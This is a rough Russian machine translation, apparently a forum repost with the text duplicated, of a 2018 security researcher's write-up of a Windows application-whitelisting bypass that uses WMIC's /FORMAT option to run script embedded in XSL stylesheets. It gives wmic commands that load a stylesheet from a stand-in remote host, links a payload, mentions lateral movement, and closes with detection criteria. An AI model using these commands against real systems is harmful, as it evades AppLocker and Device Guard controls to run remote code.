WMIC.EXE ByPass Белого списка взлом с помощью стилей
WMIC может запускать скрипты XSL (eXtensible Stylesheet Language), локально или URL-адресу. (по сылке)
Локальный файл
Список процессов wmic /FORMAT:evil.xsl
Удаленный файл
wmic os get / FORMAT: " https://example.com/evil.xsl "
Это, вероятно, полезно в средах, где Windows Script Host отключен или заблокирован.
Как и большинство исследований, это происходит не изолированно, и задаётся хороший вопрос.
Я надеюсь поделиться своим мыслительным процессом и открытием для нового метода использования Whitelisting Bypass, который я недавно обнаружил с Matt Graeber, @mattifestation.
Время открыть / проверить около 2 часов. Ниже следует серия вопросов о том, как мы это обнаружили, чтобы помочь поделиться идеями и как они были обнаружены.
Недавно я был заинтересован в некоторых атаках с помощью инструмента msxsl.exe, этот инструмент будет выполнять сценарии локально или удаленно. Поэтому я задал вопрос:
Есть ли встроенные инструменты, которые могут выполнять скрипты xsl?
Первое, что я предпринял, - это поиск любых существующих xsl-файлов.
В ваших системах может быть несколько. На моем есть десятки, даже если вы ограничиваете поиск C: \ Windows ...
Это представляло особый интерес.
Каталог
Это привело меня к действительно интересному файлу здесь, texttable.xsl.
Собственно, теперь я нашёл что-то ДЕЙСТВИТЕЛЬНО интересное.
Я нашел этот файл на win10 в wbem, называемом texttable.xsl
В нем есть много vbs
Не уверен, что в этом файле есть проверка целостности.
Этого было достаточно, чтобы вызвать мой интерес.
На этом этапе все, что я знал, это файл, который будет выполнять vbs-скрипт из xsl-файла. Это очень многообещающе ... Но как вызвать?
Наверное, это может быть каталог подписан?
Некоторые поисковые системы Google ищут ссылки на этот файл и т. Д. Подведите меня к следующему:
Это позволило указать способ вызова этого файла:
«Этот пример должен выполнить VBS в XSL:` wmic process LIST / FORMAT: TABLE` "
Немного смотря на ProcMon, и мы подтвердили, что это действительно так, как этот файл был загружен.
Я решил изменить параметр / format:, чтобы увидеть, могу ли я повлиять на поиск и получить его, чтобы загрузить мой собственный файл.
посмотрите на это, ища xsl с этим.
Итак, сейчас у нас есть что-то интересное. У нас есть wmic поиск таблицы стилей, предоставленных пользователем.
Кто заботится о стилях? Ну, есть некоторые действительно интересные теги, которые позволяют вставлять JScript или VBScript. Если это будет выполнено, это скорее всего будет выполняться в ограниченном режиме, таком как AppLocker или где Windows Script Host отключен.
2002 Статья:
https://msdn.microsoft.com/en-us/library/bb986124.aspx
msxsl: тег скрипта
https://docs.microsoft.com/en-us/do.../xslt-stylesheet-scripting-using-msxsl-script
Человек, я чувствую, что там что-то есть
Я еще не могу запустить exec, но я думаю, что мы так близки
Немного суетиться с файловой структурой и местоположением и ...
БУМ! просто получил его
просто поместите его в папку c: \ Tools
Дайте мне знать, если вы доберетесь до блокнота
После некоторой проверки как Matt Graeber, так и Matt Nelson @ enigma0x3 было подтверждено, что у нас был автономный хост сценария для Windows Application Defender Application Control
(aka Device Guard)
Важность этого заключается в том, что этот примитив приводит к произвольному бинарному исполнению.
Но мы только начинаем! Это становится лучше.
Что мы имеем сейчас:
Вероятно, это можно использовать для какого-то бокового перемещения, exec wmic на цель и вернуть его и вытащить файл xsl, как этот
Вы даже можете удалить xsl, и он разрешает
Как и regsvr32, wmic является прокси-сервером и работает над TLS.
Пример, минимальная полезная нагрузка здесь:
https://gist.githubusercontent.com/...b17d84028833220ed0b30cf9eea84b/minimalist.xsl
Может вызываться как:
Пример критериев обнаружения:
ИСТОЧНИК::https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
WMIC может запускать скрипты XSL (eXtensible Stylesheet Language), локально или URL-адресу. (по сылке)
Локальный файл
Список процессов wmic /FORMAT:evil.xsl
Удаленный файл
wmic os get / FORMAT: " https://example.com/evil.xsl "
Это, вероятно, полезно в средах, где Windows Script Host отключен или заблокирован.
Как и большинство исследований, это происходит не изолированно, и задаётся хороший вопрос.
Я надеюсь поделиться своим мыслительным процессом и открытием для нового метода использования Whitelisting Bypass, который я недавно обнаружил с Matt Graeber, @mattifestation.
Время открыть / проверить около 2 часов. Ниже следует серия вопросов о том, как мы это обнаружили, чтобы помочь поделиться идеями и как они были обнаружены.
Недавно я был заинтересован в некоторых атаках с помощью инструмента msxsl.exe, этот инструмент будет выполнять сценарии локально или удаленно. Поэтому я задал вопрос:
Есть ли встроенные инструменты, которые могут выполнять скрипты xsl?
Первое, что я предпринял, - это поиск любых существующих xsl-файлов.
В ваших системах может быть несколько. На моем есть десятки, даже если вы ограничиваете поиск C: \ Windows ...
Это представляло особый интерес.
Каталог
Итак, я начал поиск следующего уровня ... Есть ли файл .xsl по умолчанию, содержащий необходимые MS: скрипт или msxsl: теги скриптов?
Это привело меня к действительно интересному файлу здесь, texttable.xsl.
Собственно, теперь я нашёл что-то ДЕЙСТВИТЕЛЬНО интересное.
Я нашел этот файл на win10 в wbem, называемом texttable.xsl
В нем есть много vbs
Не уверен, что в этом файле есть проверка целостности.
Этого было достаточно, чтобы вызвать мой интерес.
На этом этапе все, что я знал, это файл, который будет выполнять vbs-скрипт из xsl-файла. Это очень многообещающе ... Но как вызвать?
Наверное, это может быть каталог подписан?
На этот вопрос вскоре будет дан ответ после.
Некоторые поисковые системы Google ищут ссылки на этот файл и т. Д. Подведите меня к следующему:
Это позволило указать способ вызова этого файла:
«Этот пример должен выполнить VBS в XSL:` wmic process LIST / FORMAT: TABLE` "
Немного смотря на ProcMon, и мы подтвердили, что это действительно так, как этот файл был загружен.
Я решил изменить параметр / format:, чтобы увидеть, могу ли я повлиять на поиск и получить его, чтобы загрузить мой собственный файл.
посмотрите на это, ища xsl с этим.
Итак, сейчас у нас есть что-то интересное. У нас есть wmic поиск таблицы стилей, предоставленных пользователем.
Кто заботится о стилях? Ну, есть некоторые действительно интересные теги, которые позволяют вставлять JScript или VBScript. Если это будет выполнено, это скорее всего будет выполняться в ограниченном режиме, таком как AppLocker или где Windows Script Host отключен.
2002 Статья:
https://msdn.microsoft.com/en-us/library/bb986124.aspx
msxsl: тег скрипта
https://docs.microsoft.com/en-us/do.../xslt-stylesheet-scripting-using-msxsl-script
Человек, я чувствую, что там что-то есть
Я еще не могу запустить exec, но я думаю, что мы так близки
Немного суетиться с файловой структурой и местоположением и ...
БУМ! просто получил его
просто поместите его в папку c: \ Tools
Дайте мне знать, если вы доберетесь до блокнота
После некоторой проверки как Matt Graeber, так и Matt Nelson @ enigma0x3 было подтверждено, что у нас был автономный хост сценария для Windows Application Defender Application Control
(aka Device Guard)
Важность этого заключается в том, что этот примитив приводит к произвольному бинарному исполнению.
Но мы только начинаем! Это становится лучше.
Что мы имеем сейчас:
"Чтобы запустить выполнение.
Вероятно, это можно использовать для какого-то бокового перемещения, exec wmic на цель и вернуть его и вытащить файл xsl, как этот
«
Вы даже можете удалить xsl, и он разрешает
... это тоже работает
Итак, у нас есть это еще один инструмент, например regsvr32.exe, который может принимать путь к скрипту или URL-адрес и выполнять его.
Как и regsvr32, wmic является прокси-сервером и работает над TLS.
Пример, минимальная полезная нагрузка здесь:
https://gist.githubusercontent.com/...b17d84028833220ed0b30cf9eea84b/minimalist.xsl
Может вызываться как:
Дополнительный пример, который использует контекст активации для загрузки .NET-библиотек, представленный Джеймсом Форшоу в DerbyCon 2017 ( http://www.irongeek.com/i.php?page=videos/derbycon7/s13-the-net-inter-operability -операция-джеймс-форшоу )
Пример критериев обнаружения:
- url в командной строке
- wmic внешние сетевые подключения
ИСТОЧНИК::https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
Последнее редактирование: